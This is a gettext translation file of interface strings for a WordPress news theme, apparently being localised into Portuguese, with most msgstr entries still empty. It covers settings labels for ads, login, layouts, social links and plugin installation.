msgstr "" #: backend/panels/bookmark.php:64 msgid "" "Input the redirect URL when user logged. Leave this option blank to set the " "default value." msgstr "" #: backend/single-metaboxes.php:630 msgid "Input the sponsor brand name for this post" msgstr "" #: backend/single-metaboxes.php:623 msgid "Input the sponsor website URL." msgstr "" #: backend/panels/newsletter.php:35 msgid "Input title for the popup newsletter form" msgstr "" #: backend/single-metaboxes.php:290 msgid "" "Input value or text for the custom meta that you created in Theme Options " "panel." msgstr "" #: backend/panels/single-post.php:349 msgid "Input your a description for your newsletter." msgstr "" #: backend/panels/single-post.php:342 msgid "Input your a heading for your newsletter section." msgstr "" #: backend/panels/single-post.php:356 msgid "" "Input your a newsletter (subscribe) shortcode or script to show at bottom " "entry content." msgstr "" #: backend/panels/ads.php:194 backend/panels/ads.php:383 msgid "Input your ad destination URL." msgstr "" #: backend/panels/ads.php:123 msgid "Input your ad script code." msgstr "" #: backend/panels/header.php:667 msgid "Input your alert content to show." msgstr "" #: backend/panels/header.php:674 msgid "Input your alert URL." msgstr "" #: backend/panels/amp.php:262 msgid "Input your amp auto ads code." msgstr "" #: backend/panels/amp.php:341 backend/panels/amp.php:401 #: backend/panels/amp.php:461 backend/panels/amp.php:522 #: backend/panels/amp.php:582 msgid "Input your AMP custom ad script." msgstr "" #: backend/single-metaboxes.php:387 msgid "" "Input your audio URL, support: SoundCloud, MixCloud. Do not forget to check " "\"Audio\" in Post Format section." msgstr "" #: backend/panels/ads.php:50 msgid "Input your auto ads code." msgstr "" #: backend/panels/optimized.php:203 msgid "input your company city and country address." msgstr "" #: backend/panels/optimized.php:217 msgid "input your company local postal code." msgstr "" #: backend/panels/optimized.php:196 msgid "input your company main email." msgstr "" #: backend/panels/optimized.php:189 msgid "input your company phone number." msgstr "" #: backend/panels/optimized.php:210 msgid "input your company street address." msgstr "" #: backend/panels/footer.php:192 msgid "input your copyright text or HTML." msgstr "" #: backend/panels/ads.php:312 msgid "Input your custom ad script code or Adsense." msgstr "" #: backend/panels/design.php:245 msgid "" "Input your custom CSS icon classname to display at the beginning of the meta." msgstr "" #: backend/panels/blog-pages.php:2412 msgid "" "Input your description for the 404 page. Leave this option blank to set it " "as the default." msgstr "" #: backend/panels/optimized.php:245 msgid "input your facebook app ID for OG tags." msgstr "" #: backend/panels/single-post.php:363 msgid "Input your policy text for the newsletter form, row HTML allowed." msgstr "" #: backend/panels/privacy.php:34 msgid "Input your privacy or cookie content for your website, allow raw HTML." msgstr "" #: backend/panels/socials.php:29 backend/panels/socials.php:36 #: backend/panels/socials.php:43 backend/panels/socials.php:50 #: backend/panels/socials.php:56 backend/panels/socials.php:63 #: backend/panels/socials.php:69 backend/panels/socials.php:75 #: backend/panels/socials.php:81 backend/panels/socials.php:87 #: backend/panels/socials.php:93 backend/panels/socials.php:99 #: backend/panels/socials.php:105 backend/panels/socials.php:111 #: backend/panels/socials.php:117 backend/panels/socials.php:123 #: backend/panels/socials.php:129 backend/panels/socials.php:135 #: backend/panels/socials.php:141 backend/panels/socials.php:147 #: backend/panels/socials.php:153 msgid "Input your social profile URL, Leave blank if you want to disable it." msgstr "" #: backend/panels/socials.php:178 backend/panels/socials.php:205 #: backend/panels/socials.php:232 msgid "Input your social profile URL." msgstr "" #: backend/panels/woocommerce.php:61 msgid "" "Input your template shortcode you would like to use Elementor builder to " "create a featured section at the top of shop page." msgstr "" #: backend/panels/footer.php:122 msgid "Input your template shortcode you would like to use Elementor builder." msgstr "" #: backend/single-metaboxes.php:332 msgid "Input your video link, support: Youtube, Vimeo, DailyMotion." msgstr "" #: backend/panels/typography.php:578 msgid "Inputs & Button" msgstr "" #: templates/parts.php:603 msgid "Instagram" msgstr "" #: backend/panels/socials.php:49 msgid "Instagram URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2811 msgid "Install" msgstr "" #: backend/class-tgm-plugin-activation.php:2697 #, php-format msgid "Install %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:340 backend/install-plugins.php:67 msgid "Install Plugins" msgstr "" #: backend/class-tgm-plugin-activation.php:339 backend/install-plugins.php:66 msgid "Install Required Plugins" msgstr "" #: backend/class-tgm-plugin-activation.php:2413 msgid "Installed But Not Activated" msgstr "" #: backend/class-tgm-plugin-activation.php:2584 msgid "Installed version:" msgstr "" #: backend/class-tgm-plugin-activation.php:3606 #, php-format msgid "Installing and Activating Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:3614 #, php-format msgid "Installing Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:342 backend/install-plugins.php:68 #, php-format msgid "Installing Plugin: %s" msgstr "" #: backend/panels/logo.php:159 msgid "iOS Bookmarklet Icon" msgstr "" #: backend/single-metaboxes.php:276 msgid "" "It is useful in case this post has a lot of categories and you want to " "display only one in listings." msgstr "" #: templates/blog.php:19 msgid "It looks like nothing was found at this location. Maybe try a search?" msgstr "" #: templates/page.php:124 msgid "" "It looks like nothing was found at this location. The page you were looking " "for does not exist or was loading incorrectly." msgstr "" #: templates/blog.php:501 msgid "" "It seems we can’t find what you’re looking for. Perhaps searching can help." msgstr "" "Parece que não conseguimos encontrar o que você está procurando. Talvez " "pesquisar possa ajudar." #: backend/panels/footer.php:55 msgid "It will be helpful if you have not set up footer background." msgstr "" #: backend/single-metaboxes.php:552 backend/single-metaboxes.php:566 msgid "Item" msgstr "" #: backend/single-metaboxes.php:521 msgid "Item Label" msgstr "" #: backend/panels/optimized.php:144 msgid "ItemList (Carousel) Markup" msgstr "" #: backend/panels/newsletter.php:36 msgid "Join Us!" msgstr "" #: backend/panels/reaction.php:53 msgid "Joy" msgstr "" #: includes/fallbacks.php:167 msgid "k" msgstr "" #: backend/configs.php:857 msgid "Large Leaderboard (970x90)" msgstr "" #: backend/configs.php:853 msgid "Large Rectangle (336x280)" msgstr "" #: backend/panels/single-post.php:632 backend/panels/single-post.php:638 msgid "Last Updated Date" msgstr "" #: includes/menu.php:325 templates/header/templates.php:727 msgid "Latest News" msgstr "" #: backend/category-settings.php:177 backend/panels/blog-pages.php:195 msgid "Latest Posts - Heading" msgstr "" #: backend/category-settings.php:233 backend/panels/blog-pages.php:244 msgid "Latest Posts - Layout" msgstr "" #: backend/category-settings.php:213 backend/panels/blog-pages.php:541 msgid "Latest Posts - Pagination" msgstr "" #: backend/category-settings.php:290 backend/panels/blog-pages.php:298 msgid "Latest Posts - Sidebar" msgstr "" #: backend/panels/bookmark.php:589 msgid "Layout" msgstr "" #: backend/panels/table-contents.php:110 backend/single-metaboxes.php:722 msgid "layout" msgstr "" #: backend/configs.php:107 backend/configs.php:638 backend/configs.php:697 #: backend/configs.php:736 backend/configs.php:775 msgid "Layout 1" msgstr "" #: backend/configs.php:120 msgid "Layout 1 - Center" msgstr "" #: backend/configs.php:116 msgid "Layout 10" msgstr "" #: backend/configs.php:129 msgid "Layout 10 - Center" msgstr "" #: backend/configs.php:117 msgid "Layout 11" msgstr "" #: backend/configs.php:130 msgid "Layout 11 - Center" msgstr "" #: backend/configs.php:118 msgid "Layout 12" msgstr "" #: backend/configs.php:131 msgid "Layout 12 - Center" msgstr "" #: backend/configs.php:119 msgid "Layout 13" msgstr "" #: backend/configs.php:132 msgid "Layout 13 - Center" msgstr "" #: backend/configs.php:108 backend/configs.php:642 backend/configs.php:701 #: backend/configs.php:740 backend/configs.php:779 msgid "Layout 2" msgstr "" #: backend/configs.php:121 msgid "Layout 2 - Center" msgstr "" #: backend/configs.php:109 backend/configs.php:646 backend/configs.php:705 #: backend/configs.php:744 backend/configs.php:783 msgid "Layout 3" msgstr "" #: backend/configs.php:122 msgid "Layout 3 - Center" msgstr "" #: backend/configs.php:110 backend/configs.php:650 backend/configs.php:709 #: backend/configs.php:748 msgid "Layout 4" msgstr "" #: backend/configs.php:123 msgid "Layout 4 - Center" msgstr "" #: backend/configs.php:111 backend/configs.php:654 msgid "Layout 5" msgstr "" #: backend/configs.php:124 msgid "Layout 5 - Center" msgstr "" #: backend/configs.php:112 backend/configs.php:658 msgid "Layout 6" msgstr "" #: backend/configs.php:125 msgid "Layout 6 - Center" msgstr "" #: backend/configs.php:113 backend/configs.php:662 msgid "Layout 7" msgstr "" #: backend/configs.php:126 msgid "Layout 7 - Center" msgstr "" #: backend/configs.php:114 backend/configs.php:666 msgid "Layout 8" msgstr "" #: backend/configs.php:127 msgid "Layout 8 - Center" msgstr "" #: backend/configs.php:115 msgid "Layout 9" msgstr "" #: backend/configs.php:128 msgid "Layout 9 - Center" msgstr "" #: backend/panels/login.php:20 backend/panels/table-contents.php:105 msgid "Layout Settings" msgstr "" #: backend/panels/single-post.php:28 msgid "Layouts" msgstr "" #: backend/panels/optimized.php:27 msgid "Lazy Load Featured Image" msgstr "" #: backend/configs.php:842 msgid "Leaderboard (728x90)" msgstr "" #: includes/actions.php:55 templates/single/review-comment.php:97 #: templates/single/templates.php:906 msgid "Leave a comment" msgstr "Deixe um comentário" #: templates/single/review-comment.php:50 msgid "Leave a reply" msgstr "" #: templates/single/review-comment.php:49 templates/single/templates.php:883 msgid "Leave a review" msgstr "" #: backend/panels/amp.php:287 msgid "Leave blank AMP auto ads if you would like to use the ad units." msgstr "" #: backend/panels/footer.php:115 backend/panels/footer.php:215 msgid "" "Leave blank if you use the \"Archive & Menu Widgets\" font size setting." msgstr "" #: backend/panels/blog-pages.php:694 msgid "" "Leave this option blank if you want to use standard blog layout settings." msgstr "" #: backend/panels/block-classic.php:92 backend/panels/block-grid.php:92 #: backend/panels/block-grid.php:257 backend/panels/block-grid.php:422 #: backend/panels/block-grid.php:595 backend/panels/block-grid.php:782 #: backend/panels/block-list.php:100 backend/panels/block-list.php:273 #: backend/panels/block-list.php:454 backend/panels/block-list.php:649 #: backend/panels/blog-pages.php:437 backend/panels/blog-pages.php:924 #: backend/panels/blog-pages.php:1338 backend/panels/blog-pages.php:1746 #: backend/panels/blog-pages.php:2238 backend/panels/bookmark.php:336 #: backend/panels/bookmark.php:784 msgid "Leave this option blank or set 0 to disable." msgstr "" #: backend/panels/login.php:59 msgid "Leave this option blank to redirect to the homepage." msgstr "" #: backend/panels/login.php:105 backend/panels/login.php:113 msgid "Leave this option blank to set the default value." msgstr "" #: backend/panels/ads.php:53 msgid "Leave this option blank to use unit ads code." msgstr "" #: backend/configs.php:175 backend/configs.php:544 backend/configs.php:823 msgid "Left" msgstr "" #: backend/configs.php:336 msgid "Left Dot" msgstr "" #: backend/panels/footer.php:46 msgid "Left Dotted Style" msgstr "" #: backend/panels/header.php:343 msgid "Left Logo" msgstr "" #: backend/panels/header.php:345 msgid "Left Logo 2" msgstr "" #: backend/mega-menu.php:156 backend/panels/footer.php:66 #: backend/panels/header-style.php:92 backend/panels/header-style.php:380 #: backend/panels/header-style.php:647 backend/panels/header.php:289 msgid "Light Text" msgstr "" #: backend/panels/design.php:574 msgid "Link Hover Effect" msgstr "" #: backend/panels/single-post.php:759 backend/panels/single-post.php:898 #: backend/panels/single-post.php:1036 backend/panels/single-post.php:1665 #: templates/parts.php:606 msgid "LinkedIn" msgstr "" #: backend/panels/socials.php:62 msgid "LinkedIn URL" msgstr "" #: backend/panels/block-list.php:27 backend/panels/block-list.php:200 msgid "list" msgstr "" #: backend/category-settings.php:249 msgid "List 1" msgstr "" #: backend/configs.php:471 backend/panels/block-list.php:17 msgid "List 1 (Standard)" msgstr "" #: backend/category-settings.php:250 backend/configs.php:475 #: backend/panels/block-list.php:190 msgid "List 2" msgstr "" #: templates/single/templates.php:1341 msgid "List of Images" msgstr "" #: backend/panels/header.php:215 msgid "Live Search Result" msgstr "" #: backend/panels/design.php:711 msgid "Load Font Awesome" msgstr "" #: backend/panels/design.php:712 msgid "" "Load font Awesome icons library to your website. This will help you can " "embed this font icons to your widgets and content." msgstr "" #: backend/panels/design.php:706 msgid "" "Load font Awesome icons library. Enabling this option may affect to the site " "performance." msgstr "" #: backend/configs.php:562 backend/panels/bookmark.php:574 msgid "Load More (Ajax)" msgstr "" #: backend/panels/optimized.php:202 msgid "Locality Address" msgstr "" #: backend/panels/login.php:36 msgid "Login Form Position" msgstr "" #: backend/panels/login.php:51 msgid "Login Logo" msgstr "" #: backend/panels/bookmark.php:63 backend/panels/header.php:588 #: backend/panels/login.php:103 msgid "Login Redirect URL" msgstr "" #: backend/panels/login.php:12 msgid "Login Screen" msgstr "" #: backend/panels/login.php:66 msgid "Login Screen Background" msgstr "" #: backend/panels/login.php:79 msgid "Login Screen Color" msgstr "" #: backend/panels/logo.php:16 msgid "Logo" msgstr "" #: backend/panels/login.php:57 msgid "Logo - Destination URL" msgstr "" #: backend/panels/amp.php:97 backend/panels/footer.php:158 msgid "Logo Height" msgstr "" #: backend/panels/header-style.php:368 backend/panels/header-style.php:635 msgid "Logo Max Height" msgstr "" #: backend/panels/header.php:618 backend/panels/login.php:111 msgid "Logout Redirect URL" msgstr "" #: templates/popup.php:208 msgid "Lost your password?" msgstr "Esqueceu sua senha?" #: backend/panels/reaction.php:42 msgid "Love" msgstr "" #: includes/fallbacks.php:165 msgid "M" msgstr "" #: backend/panels/logo.php:46 msgid "Main Logo" msgstr "" #: backend/panels/typography.php:902 functions.php:56 #: templates/header/templates.php:241 msgid "Main Menu" msgstr "" #: templates/header/templates.php:248 msgid "main menu" msgstr "" #: backend/panels/sidebar.php:48 msgid "Making sidebars permanently visible when scrolling up and down." msgstr "" #: backend/category-settings.php:312 msgid "Making this sidebar permanently visible when scrolling up and down." msgstr "" #: backend/mega-menu.php:288 includes/fallbacks.php:274 msgid "Manage Locations" msgstr "" #: backend/panels/page.php:42 backend/panels/single-post.php:182 #: backend/single-metaboxes.php:69 msgid "Max Width Content without Sidebar" msgstr "" #: backend/panels/design.php:68 msgid "Maximum Entry Categories" msgstr "" #: backend/configs.php:852 msgid "Medium Rectangle (300x250)" msgstr "" #: backend/mega-menu.php:124 backend/mega-menu.php:165 msgid "Mega Menu" msgstr "" #: backend/panels/header-style.php:88 backend/panels/header-style.php:376 #: backend/panels/header-style.php:643 msgid "Mega Menu - Text Color Scheme" msgstr "" #: backend/panels/typography.php:908 msgid "Menu Font" msgstr "" #: backend/panels/design.php:592 msgid "Menu Hover Effect" msgstr "" #: backend/mega-menu.php:234 msgid "Menu Icon" msgstr "" #: backend/single-metaboxes.php:540 msgid "Meta Description" msgstr "" #: backend/panels/design.php:244 msgid "Meta Icon ClassName" msgstr "" #: backend/panels/design.php:237 msgid "Meta Label" msgstr "" #: backend/panels/design.php:254 msgid "Meta Label Position" msgstr "" #: backend/panels/logo.php:167 msgid "Metro UI Bookmarklet Icon" msgstr "" #: backend/panels/header.php:729 msgid "Mini Cart" msgstr "" #: backend/class-tgm-plugin-activation.php:2592 msgid "Minimum required version:" msgstr "" #: backend/panels/color.php:118 msgid "Miscellaneous" msgstr "" #: backend/category-settings.php:487 backend/panels/block-classic.php:147 #: backend/panels/block-grid.php:147 backend/panels/block-grid.php:312 #: backend/panels/block-grid.php:477 backend/panels/block-grid.php:650 #: backend/panels/block-grid.php:837 backend/panels/block-list.php:155 #: backend/panels/block-list.php:328 backend/panels/block-list.php:509 #: backend/panels/block-list.php:704 backend/panels/blog-pages.php:512 #: backend/panels/blog-pages.php:999 backend/panels/blog-pages.php:1413 #: backend/panels/blog-pages.php:1821 backend/panels/blog-pages.php:2313 #: backend/panels/bookmark.php:859 backend/panels/single-post.php:608 #: backend/panels/single-post.php:617 msgid "Mobile - Hide Entry Meta" msgstr "" #: backend/category-settings.php:457 backend/panels/blog-pages.php:482 #: backend/panels/blog-pages.php:969 backend/panels/blog-pages.php:1383 #: backend/panels/blog-pages.php:1791 backend/panels/blog-pages.php:2283 #: backend/panels/bookmark.php:381 backend/panels/bookmark.php:829 msgid "Mobile - Title Font Size" msgstr "" #: backend/configs.php:859 msgid "Mobile Banner (320x100)" msgstr "" #: backend/configs.php:856 msgid "Mobile Banner (320x50)" msgstr "" #: backend/panels/typography.php:52 backend/panels/typography.php:98 #: backend/panels/typography.php:147 backend/panels/typography.php:196 #: backend/panels/typography.php:245 backend/panels/typography.php:294 #: backend/panels/typography.php:343 backend/panels/typography.php:392 #: backend/panels/typography.php:441 backend/panels/typography.php:507 #: backend/panels/typography.php:555 backend/panels/typography.php:610 #: backend/panels/typography.php:653 backend/panels/typography.php:729 #: backend/panels/typography.php:786 backend/panels/typography.php:870 #: backend/panels/typography.php:1056 backend/panels/typography.php:1128 msgid "Mobile Font Size" msgstr "" #: backend/configs.php:860 msgid "Mobile Friendly (300x100)" msgstr "" #: backend/panels/header.php:306 msgid "Mobile Header" msgstr "" #: backend/panels/header.php:746 msgid "Mobile Header - Mini Cart" msgstr "" #: backend/panels/header.php:237 msgid "Mobile Header - Search Icon" msgstr "" #: backend/panels/header.php:540 msgid "Mobile Header - Sign In" msgstr "" #: backend/panels/header.php:402 msgid "Mobile Header Colors" msgstr "" #: backend/panels/header.php:340 msgid "Mobile Header Layout" msgstr "" #: backend/panels/header.php:333 msgid "Mobile Header Style" msgstr "" #: backend/panels/logo.php:95 msgid "Mobile Logo" msgstr "" #: backend/panels/logo.php:85 msgid "Mobile Logos" msgstr "" #: backend/panels/typography.php:947 functions.php:57 #: templates/header/templates.php:609 msgid "Mobile Menu" msgstr "" #: backend/panels/typography.php:953 msgid "Mobile Menu Font" msgstr "" #: backend/panels/header.php:353 msgid "Mobile Navigation Height" msgstr "" #: backend/panels/typography.php:992 functions.php:58 msgid "Mobile Quick Access" msgstr "" #: backend/panels/typography.php:998 msgid "Mobile Quick Access Menu Font" msgstr "" #: backend/panels/color.php:102 msgid "Mode Switcher - Dark Icon Background" msgstr "" #: backend/panels/color.php:94 msgid "Mode Switcher - Light Icon Color" msgstr "" #: templates/header/templates.php:421 msgid "More" msgstr "" #: backend/panels/header.php:222 msgid "More Menu - Search Form" msgstr "" #: backend/panels/header-style.php:29 backend/panels/header-style.php:323 #: backend/panels/header-style.php:574 msgid "More Menu Button" msgstr "" #: backend/panels/header.php:112 msgid "More Menu Item" msgstr "" #: includes/sidebars.php:86 msgid "More Menu Section" msgstr "" #: backend/panels/header.php:208 msgid "More Menu Triggered" msgstr "" #: templates/ajax.php:186 msgid "More Results" msgstr "Mais resultados" #: templates/parts.php:621 msgid "Myspace" msgstr "" #: backend/panels/socials.php:92 msgid "Myspace URL" msgstr "" #: backend/panels/login.php:96 msgid "Navigate to \"Header > Popup Sign In\" to set for the popup login form." msgstr "" #: backend/panels/blog-pages.php:229 msgid "" "Navigate to \"Heading Design\" panel to edit font size for table and mobile " "device." msgstr "" #: backend/panels/heading.php:42 msgid "" "Navigate to \"Typography Settings > Block Heading\" to set the font values." msgstr "" #: backend/panels/footer.php:201 msgid "" "Navigate to Typography > Archive & Menu Widgets > Footer Menus to set the " "font values." msgstr "" #: backend/panels/header-style.php:112 backend/panels/header-style.php:400 #: backend/panels/header-style.php:480 backend/panels/header-style.php:667 #: backend/panels/header-style.php:746 msgid "Navigation Background" msgstr "" #: backend/panels/blog-pages.php:45 backend/panels/blog-pages.php:611 #: backend/panels/blog-pages.php:1929 backend/panels/header-style.php:68 #: backend/panels/header-style.php:345 backend/panels/header-style.php:613 #: backend/single-metaboxes.php:129 backend/single-metaboxes.php:906 msgid "Navigation Bar Style" msgstr "" #: backend/panels/header-style.php:51 backend/panels/header-style.php:596 msgid "Navigation Bar Style & Layout" msgstr "" #: backend/panels/header-style.php:106 backend/panels/header-style.php:394 #: backend/panels/header-style.php:661 msgid "Navigation Colors" msgstr "" #: backend/panels/header-style.php:361 backend/panels/header-style.php:628 msgid "Navigation Height" msgstr "" #: backend/mega-menu.php:210 msgid "Navigation Sub Label" msgstr "" #: templates/parts.php:395 msgid "Newer Articles" msgstr "" #: comments.php:26 msgid "Newer Comments →" msgstr "" #: templates/single/review-comment.php:37 msgid "Newer Reviews" msgstr "" #: backend/panels/single-post.php:348 msgid "Newsletter Description" msgstr "" #: templates/blocks/newsletter.php:42 templates/blocks/newsletter.php:44 #: templates/blocks/newsletter.php:47 templates/blocks/newsletter.php:106 #: templates/blocks/newsletter.php:108 templates/blocks/newsletter.php:111 msgid "newsletter featured" msgstr "" #: backend/panels/single-post.php:341 msgid "Newsletter Heading" msgstr "" #: backend/panels/newsletter.php:48 backend/panels/single-post.php:355 msgid "Newsletter Shortcode" msgstr "" #: templates/parts.php:349 msgid "Next" msgstr "" #: templates/single/templates.php:1029 msgid "Next Article" msgstr "" #: templates/single/templates.php:580 msgid "Next Page" msgstr "" #: backend/panels/single-post.php:1372 msgid "Next Prev" msgstr "" #: backend/panels/single-post.php:401 msgid "Next/Prev - Mobile Hide" msgstr "" #: backend/panels/amp.php:204 msgid "Next/Prev Articles" msgstr "" #: backend/panels/single-post.php:392 msgid "Next/Prev Post Pagination" msgstr "" #: backend/class-tgm-plugin-activation.php:402 #, php-format msgid "No action taken. Plugin %1$s was already active." msgstr "" #: backend/panels/design.php:677 msgid "No Border" msgstr "" #: backend/configs.php:670 msgid "No Featured" msgstr "" #: templates/parts.php:114 msgid "" "No found posts, Please add a new post for this query or change the block " "settings: " msgstr "" #: backend/configs.php:525 msgid "No Gap" msgstr "" #: backend/panels/page.php:35 backend/single-metaboxes.php:63 msgid "No Header" msgstr "" #: backend/class-tgm-plugin-activation.php:3028 msgid "No plugins are available to be activated at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2894 msgid "No plugins are available to be installed at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2896 msgid "No plugins are available to be updated at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2627 msgid "No plugins to install, update or activate." msgstr "" #: backend/class-tgm-plugin-activation.php:3002 msgid "No plugins were selected to be activated. No action taken." msgstr "" #: backend/class-tgm-plugin-activation.php:2851 msgid "No plugins were selected to be installed. No action taken." msgstr "" #: backend/class-tgm-plugin-activation.php:2853 msgid "No plugins were selected to be updated. No action taken." msgstr "" #: backend/configs.php:168 backend/configs.php:543 msgid "No Sidebar" msgstr "" #: backend/panels/ads.php:242 msgid "No spacing" msgstr "" #: backend/panels/blog-pages.php:53 backend/panels/blog-pages.php:619 #: backend/panels/blog-pages.php:1937 backend/panels/design.php:276 #: backend/panels/header-style.php:74 backend/panels/header-style.php:622 #: backend/single-metaboxes.php:136 backend/single-metaboxes.php:913 msgid "None" msgstr "" #: backend/panels/single-post.php:212 msgid "Normal" msgstr "" #: backend/panels/single-post.php:211 msgid "Normal Italic" msgstr "" #: backend/panels/ads.php:536 msgid "Not Activate - Button Background" msgstr "" #: backend/panels/ads.php:528 msgid "Not Activate - Button Text Color" msgstr "" #: backend/class-tgm-plugin-activation.php:2409 msgid "Not Installed" msgstr "" #: templates/single/review-comment.php:93 msgid "Not that Bad" msgstr "" #: templates/blog.php:13 msgid "Nothing Found" msgstr "" #: backend/panels/header.php:261 templates/header/templates.php:694 #: templates/header/templates.php:699 msgid "Notification" msgstr "" #: backend/panels/header.php:269 msgid "Notification Section" msgstr "" #: templates/blocks/playlist.php:52 msgid "Now Playing" msgstr "" #: backend/panels/single-post.php:1361 msgid "Number of Posts" msgstr "" #: backend/configs.php:560 backend/panels/blog-pages.php:1452 #: backend/panels/blog-pages.php:1860 msgid "Numeric" msgstr "" #: backend/single-metaboxes.php:586 msgid "Offer Destination URL" msgstr "" #: backend/single-metaboxes.php:580 msgid "Offer Label" msgstr "" #: templates/popup.php:242 msgid "Okay, I'll Whitelist" msgstr "" #: templates/parts.php:398 msgid "Older Articles" msgstr "" #: templates/single/review-comment.php:36 msgid "Older Reviews" msgstr "" #: backend/category-settings.php:470 backend/category-settings.php:500 #: backend/configs.php:254 backend/panels/blog-pages.php:494 #: backend/panels/blog-pages.php:524 backend/panels/blog-pages.php:981 #: backend/panels/blog-pages.php:1011 backend/panels/blog-pages.php:1395 #: backend/panels/blog-pages.php:1425 backend/panels/blog-pages.php:1803 #: backend/panels/blog-pages.php:1833 backend/panels/blog-pages.php:2295 #: backend/panels/blog-pages.php:2325 backend/panels/bookmark.php:393 #: backend/panels/bookmark.php:841 msgid "On Mobile" msgstr "" #: backend/category-settings.php:471 backend/category-settings.php:501 #: backend/configs.php:255 backend/panels/blog-pages.php:495 #: backend/panels/blog-pages.php:525 backend/panels/blog-pages.php:982 #: backend/panels/blog-pages.php:1012 backend/panels/blog-pages.php:1396 #: backend/panels/blog-pages.php:1426 backend/panels/blog-pages.php:1804 #: backend/panels/blog-pages.php:1834 backend/panels/blog-pages.php:2296 #: backend/panels/blog-pages.php:2326 backend/panels/bookmark.php:394 #: backend/panels/bookmark.php:842 msgid "On Tablet" msgstr "" #: backend/category-settings.php:472 backend/category-settings.php:502 #: backend/configs.php:256 backend/panels/blog-pages.php:496 #: backend/panels/blog-pages.php:526 backend/panels/blog-pages.php:983 #: backend/panels/blog-pages.php:1013 backend/panels/blog-pages.php:1397 #: backend/panels/blog-pages.php:1427 backend/panels/blog-pages.php:1805 #: backend/panels/blog-pages.php:1835 backend/panels/blog-pages.php:2297 #: backend/panels/blog-pages.php:2327 backend/panels/bookmark.php:395 #: backend/panels/bookmark.php:843 msgid "On Tablet & Mobile" msgstr "" #: includes/sidebars.php:106 includes/sidebars.php:115 #: includes/sidebars.php:124 includes/sidebars.php:134 #: includes/sidebars.php:145 msgid "one of the columns of the footer area." msgstr "" #: backend/theme-options.php:224 msgid "Online Documentation" msgstr "" #: backend/panels/blog-pages.php:1901 msgid "Only display posts in the search results." msgstr "" #: backend/panels/header.php:658 msgid "Only Homepage" msgstr "" #: backend/panels/single-post.php:1450 msgid "Only load posts which has same categories with the current post." msgstr "" #: backend/panels/bookmark.php:55 msgid "Only Logged Users" msgstr "" #: backend/panels/blog-pages.php:1900 msgid "Only Search Posts" msgstr "" #: backend/panels/header.php:659 msgid "Only show the bar in the homepage." msgstr "" #: backend/panels/header.php:90 msgid "Only stick the main menu when scrolling up." msgstr "" #: backend/configs.php:328 msgid "Only Text" msgstr "" #: backend/configs.php:329 msgid "Only Text (Big)" msgstr "" #: templates/blog.php:494 msgid "Oops! Nothing here" msgstr "Ops! Nada aqui" #: backend/panels/optimized.php:230 backend/panels/optimized.php:236 msgid "Open Graph" msgstr "" #: backend/panels/single-post.php:175 msgid "Optimal Line Length" msgstr "" #: backend/panels/single-post.php:172 msgid "" "Optimized the line length of the post content for reading (max width: 730px)." msgstr "" #: backend/single-metaboxes.php:45 msgid "" "Options below will apply to the single page and Elementor page. To config " "for the blog page, navigate to Theme Options > Blog & Achives." msgstr "" #: backend/mega-menu.php:242 msgid "or Attachment/SVG Icon" msgstr "" #: backend/mega-menu.php:197 msgid "or Ruby Templates Shortcode" msgstr "" #: backend/panels/optimized.php:175 msgid "Organization Info" msgstr "" #: backend/panels/optimized.php:121 msgid "Organization Schema Markup" msgstr "" #: backend/panels/single-post.php:586 msgid "" "Organize how you want the entry meta info to appear in the single post pages." msgstr "" #: backend/panels/block-classic.php:51 backend/panels/block-grid.php:51 #: backend/panels/block-grid.php:216 backend/panels/block-grid.php:381 #: backend/panels/block-grid.php:554 backend/panels/block-grid.php:741 #: backend/panels/block-list.php:59 backend/panels/block-list.php:232 #: backend/panels/block-list.php:413 backend/panels/block-list.php:608 #: backend/panels/blog-pages.php:385 backend/panels/blog-pages.php:872 #: backend/panels/blog-pages.php:1286 backend/panels/blog-pages.php:1694 #: backend/panels/blog-pages.php:2186 backend/panels/bookmark.php:284 #: backend/panels/bookmark.php:732 msgid "" "Organize how you want the entry meta to appear. Leave blank to set it as the " "default." msgstr "" #: backend/panels/design.php:394 msgid "Original Ratio - 1536x0" msgstr "" #: backend/panels/design.php:386 msgid "Original Ratio - 860x0" msgstr "" #: backend/panels/adblock.php:35 msgid "" "Our site is an advertising supported site. Please whitelist to support our " "site." msgstr "" #: templates/entry.php:1087 msgid "out of 10" msgstr "" #: templates/entry.php:1090 msgid "out of 5" msgstr "" #: backend/panels/header.php:232 msgid "Override default search icon with a SVG icon." msgstr "" #: backend/single-metaboxes.php:229 msgid "p" msgstr "" #: backend/configs.php:243 msgid "p tag" msgstr "" #: backend/panels/breadcrumb.php:45 msgid "Page Breadcrumbs" msgstr "" #: backend/single-metaboxes.php:56 msgid "Page Header Style" msgstr "" #: backend/panels/blog-pages.php:1029 msgid "Pagination" msgstr "" #: backend/panels/single-post.php:1367 msgid "Pagination Style" msgstr "" #: backend/category-settings.php:225 backend/panels/blog-pages.php:547 #: backend/panels/blog-pages.php:1035 backend/panels/blog-pages.php:1448 #: backend/panels/blog-pages.php:1856 backend/panels/blog-pages.php:2348 #: backend/panels/bookmark.php:569 msgid "Pagination Type" msgstr "" #: backend/panels/single-post.php:171 msgid "Paragraph Line Length" msgstr "" #: backend/configs.php:610 msgid "Pattern Diagonal" msgstr "" #: backend/configs.php:611 msgid "Pattern Diagonal 2" msgstr "" #: backend/configs.php:608 msgid "Pattern Dotted" msgstr "" #: backend/configs.php:609 msgid "Pattern Dotted 2" msgstr "" #: templates/single/review-comment.php:90 msgid "Perfect" msgstr "" #: backend/panels/optimized.php:14 msgid "Performance" msgstr "" #: backend/panels/optimized.php:188 msgid "Phone Number" msgstr "" #: backend/panels/single-post.php:741 backend/panels/single-post.php:880 #: backend/panels/single-post.php:1018 backend/panels/single-post.php:1649 #: templates/parts.php:600 msgid "Pinterest" msgstr "" #: backend/panels/socials.php:55 msgid "Pinterest URL" msgstr "" #: includes/fallbacks.php:273 #, php-format msgid "Please assign a menu to the \"%s\" location under " msgstr "" #: backend/panels/design.php:70 msgid "Please blank to display all categories" msgstr "" #: backend/class-tgm-plugin-activation.php:409 msgid "Please contact the administrator of this site for help." msgstr "" #: backend/class-tgm-plugin-activation.php:1027 #: backend/class-tgm-plugin-activation.php:1030 msgid "" "Please contact the plugin provider and ask them to package their plugin " "according to the WordPress guidelines." 